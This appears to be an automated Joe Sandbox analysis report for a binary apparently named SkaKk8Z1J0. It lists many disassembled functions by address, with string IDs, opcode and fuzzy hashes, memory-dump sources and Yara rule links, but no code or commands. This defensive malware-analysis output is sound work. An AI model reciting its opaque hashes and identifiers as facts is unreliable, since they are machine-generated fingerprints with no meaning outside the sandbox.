                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Fg
                                                                                                                                                                                                                                                  • API String ID: 0-875302535
                                                                                                                                                                                                                                                  • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                  • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                  Function 00746117 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                                                                                                                  • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                  • Instruction ID: 610beb603e8fa411f0dcbb9d0549276ddf9f72b012b20899a67e41615d8c0fbd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60B138712083859FD325CF18C98061BFBE0AFAA704F444A2DE5D997342D775EA18CBA7
                                                                                                                                                                                                                                                  Function 00405EB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                                                                                                                  • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                  • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                  Function 0075B348 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: js{g
                                                                                                                                                                                                                                                  • API String ID: 0-1014319796
                                                                                                                                                                                                                                                  • Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                  • Instruction ID: f60bb6b7ffa3706411ff7c04b6b34e89213901b49dc293894937fed48dafaf0b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58814771655B804BE7398F35C8517ABBBE2AB52718F08895CD5C39BF85C7B8E40ACB00
                                                                                                                                                                                                                                                  Function 0041B0E1 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: js{g
                                                                                                                                                                                                                                                  • API String ID: 0-1014319796
                                                                                                                                                                                                                                                  • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                  • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                                                                                                                                                                                                                  Function 0041714B Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1553575800
                                                                                                                                                                                                                                                  • Opcode ID: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                  • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                                                                                                                                                                                                                  Function 0077D557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 0-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                  • Instruction ID: 53afc4b46767a6a8881c9ef1201dcf4754312dd8524e6833179b27e6a3fda7c1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3981A0746042019FDB24DF28C881A6BB7F2EF99394F15C52CE5898B361DB35EC51CB82
                                                                                                                                                                                                                                                  Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                  • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                  Function 007573B2 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                                  • API String ID: 0-1553575800
                                                                                                                                                                                                                                                  • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                  • Instruction ID: e6eafd0062748c3e8420e788e4346fa297db7fbacadf4214b8beb1c743c59020
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97710271604B818FD318CF39D8907A6BBD2EB95315F18C57DC496CB7A2EAB8E846C740
                                                                                                                                                                                                                                                  Function 0076A637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: f54d82d756ba5bc13d69f8fb16ccb2e75ceee147cb7f5e99b55b9f10e48afc1b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C71F832A08356AFD715CE2CC88031EBBE2ABC5750F29C56DE896A7391D639DC458F43
                                                                                                                                                                                                                                                  Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                  Function 00424502 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: DB
                                                                                                                                                                                                                                                  • API String ID: 0-3908451873
                                                                                                                                                                                                                                                  • Opcode ID: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                  • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                  Function 00424A74 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LB
                                                                                                                                                                                                                                                  • API String ID: 0-539997225
                                                                                                                                                                                                                                                  • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                  • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                  Function 0075DFB7 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Y*>
                                                                                                                                                                                                                                                  • API String ID: 0-3862480330
                                                                                                                                                                                                                                                  • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                  • Instruction ID: 3d85f28cb808d993c924dcf699afb53deceee306f51d06abbe18b1120f6d8fc6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A51F933B599814BE72C893C5C222EA6A834BD6235B3DD77AD8B5CB3E5D5F94C094340
                                                                                                                                                                                                                                                  Function 0041DD50 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Y*>
                                                                                                                                                                                                                                                  • API String ID: 0-3862480330
                                                                                                                                                                                                                                                  • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                  • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                  Function 00768009 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: m
                                                                                                                                                                                                                                                  • API String ID: 0-3775001192
                                                                                                                                                                                                                                                  • Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                  • Instruction ID: 67bd73f808bcc85d42f259ef75c61f0512a5ab17496965a77427ba708bf8b9c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC5124B19083808FD720DF64C49566FBBE1AFD1304F048A2DE9D647352DA39D909CB93
                                                                                                                                                                                                                                                  Function 0077A9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: w
                                                                                                                                                                                                                                                  • API String ID: 0-2991200456
                                                                                                                                                                                                                                                  • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                  • Instruction ID: 5a287d5ce3ffe8f8ce0fb221185c33fff87ed4a357b9747c717c55dfe9cb3876
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 774128B6E116158FD704DFA4CC455AFBB72FB84315B0AC1A8C8847B316D77869078BD0
                                                                                                                                                                                                                                                  Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: w
                                                                                                                                                                                                                                                  • API String ID: 0-2991200456
                                                                                                                                                                                                                                                  • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                  • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                  Function 0077CFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 0-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                  • Instruction ID: a6ac21b0af254eb8efd351999dc69af59c4762f7daa5acdec8476a7a7329e4d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC31F434304300ABEB209F24DC95B3FB7B5EF86754F24992CE58D93290D669EC51CA56
                                                                                                                                                                                                                                                  Function 0077D0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 0-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                  • Instruction ID: c72cee29949d12a57f7b08d1225377abbf9e9ccd922525f9113d0f93a7692dff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C310974304305ABEB208B14DC81B3BB7F5EF86754F65892CE6C867291D635EC50CB56
                                                                                                                                                                                                                                                  Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                  • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
